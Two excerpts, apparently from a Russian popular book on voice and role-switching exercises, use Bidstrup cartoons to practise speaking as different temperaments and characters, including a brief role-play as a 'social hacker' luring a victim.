по-мужски: сердито так нервничает, разве что на пол не сплевывает. Семейный раздор? Вполне может быть, тем более что вышли они на одной остановке, она чуть ли не вприпрыжку бежит впереди, а он догоняет ее, уткнувшись взглядом в землю. Бег по кругуА теперь давайте усложним задание: если раньше нужно было побыть в определенной роли один день, то теперь только час. Но — после того как этот час пройдет, наступит другой час, в котором будет другая роль. И так в течение всего дня: час — одна роль, час — другая. Когда научитесь хорошо выполнять это упражнение, службу вам это сослужит удивительную: умение быстро переключаться между различными состояниями вещь сложнопереоценимая. А теперь еще усложним задание. Пригласите несколько друзей, если вы занимаетесь в одиночку и у вас нет партнеров по занятиям, поставьте их в ряд или в круг и с каждым по пять минут поговорите. Но с одним вы говорите как флегматик, со вторым как меланхолик, с третьим как сангвиник, с четвертым как холерик, а с пятым вы говорите в роли сержанта, который "обучает воинскому искусству" неопытного новобранца (см. рис. 5.1 из серии карикатур "Манера говорить"), с шестым — как неопытный новобранец, слушающий, что говорит ему сержант и проклинающий про себя его в частности и всю армию вообще и т. д. Вот так, быстро меняя роли, переходя от одной к другой. А когда освоите и это упражнение, для тех, кому понравилось, предлагаю два следующих. Поставьте ваших партнеров друг против друга, сами встаньте между ними. И начинайте говорить. Сначала с первым, стоя к нему лицом. Говорите с ним, допустим, как типичный холерик, кричите на него, орете, что сил есть, сами себя заводите и сами выходите из себя… И — раз! — быстро повернулись ко второму партнеру и с ним говорите в прямо противоположной манере: просящим извиняющимся голосом вечного должника… И — снова быстро к первому лицом! — и снова крики, вопли, ругательства… И так далее. Главное, чтобы на вашем лице, в вашей мимике, после того, как вы повернулись ко второму партнеру, не было и следа от той роли, в которой вы говорили с первым. И перестроиться нужно в течение полуоборота. В этом и суть тренировки. Не буду скрывать, это не просто. И достигается это не за один день. Но, опять же, достигнув, никогда об этом не пожалеете. Потому что применять это умение можно где угодно. Хоть в тех же уличных разборках. Примечание Повторюсь еще раз в силу важности момента. Упражнение нелегкое. Как нелегок любой труд, от которого следует сильная отдача. И если его делать "наполовинку", то лучше не начинать делать вообще. Потому что от неверно выполненного в "боевых условиях" приема можно очень сильно пострадать самому. Если вы при встрече с теми же хулиганами будете, скажем так, "неискренни" в своей роли, то лучше и не начинать ее играть. Поэтому в таких тренировках очень важны партнеры, которые укажут вам, что вы где-то не доиграли, что предыдущая эмоция не успела убраться с лица, что вы заикаетесь, несмотря на то, что вам кажется, что вы кричите, и т. д. Следующее упражнение. Попробуйте часть фразы или предложения сказать одним тоном, а вторую часть этого же предложения совершенно другим. Можете потом применять по назначению к охамевшим товарищам. К примеру, фраза: "Саша, пожалуйста, я тебя очень прошу, никогда так больше не делай". Это вы говорите Саше, который вас в чем-то только что сильно оскорбил. Сказать это можно так: первую часть фразы говорим с выражением величайшего благоговения к Саше, с выражением полной покорности на лице, чуть заикаясь от осознания его величия в этом мире, переминаясь с ноги на ногу, ссутулив плечи, уставив свой взгляд где-то в середину груди вашего собеседника. И после слова "прошу", — резкая смена тональности!, — и вторую часть фразы произносим максимально жестко, резко, впечатывая слова в Сашу, плечи расправили, стойка боевая, взгляд, чуть исподлобья — прямо в глаза или переносицу. Выглядеть это будет примерно так. "С-саш… П-пожалуста. Я т-тебя очень п-прошу НИКОГДА. ТАК. БОЛЬШЕ. НЕ ДЕЛАЙ!".
-
Умение говорить — это очень важно. Причем говорить не так, как вы обычно говорите, а так, как того требует ситуация. Простое упражнение для начала. Попробуйте сказать "Да" как "Нет", а "Нет" как "Да". Получилось? А теперь попробуйте сказать "Да", как это сказал бы: Анекдот в тему — Штирлиц! Я знаю, что вы врете. Но почему-то я вам верю. • пылкий возлюбленный, которого его любимая подруга спросила, хочет ли он с ней провести остаток вечера…; • никому не могущий отказать человек, который кроме "Да" ничего говорить не умеет (Ну, конечно, д-д-а-а-да); • истеричная женщина (вон отсюДАААААА!!!). А "Нет" скажите как: • кокетливая девушка, которая хочет сказать "Да", но ей этого не позволяют моральные устои; • пьяный прапорщик; • трезвый тракторист, который уже готовится выпить, но предложение об этом поступило раньше окончания рабочего дня; • потрясенный чем-то человек (Нет, только не это…); • убитый горем крокодил; • игривая такса. И так далее… А теперь потренируйтесь говорить так, как показано на следующих карикатурах X. Бидструпа (карикатура "Манера говорить"). 1. Вот так. Как старший сержант, который просто впечатывает свои слова в собеседника (рис. 5.1). Рис. 5.1. Фрагмент карикатуры X. Бидструпа "Манера говорить" 2. Или вот так. Как полковник с провинившимся капитаном (рис. 5.2). На этом оставим армию и перейдем к другим примерам. 3. Поговорите так, как говорил бы опытный ловелас, соблазняющий свою очередную пассию (рис. 5.3). 4. А теперь поговорите как социальный хакер, заманивающий в свою паутину очередную жертву (рис. 5.4). 5. Или как оратор, "затуманивающий" мозги аудитории (рис. 5.5). Рис. 5.2. Фрагмент карикатуры X. Бидструпа "Манера говорить" Рис. 5.3. Фрагмент карикатуры X. Бидструпа "Манера говорить"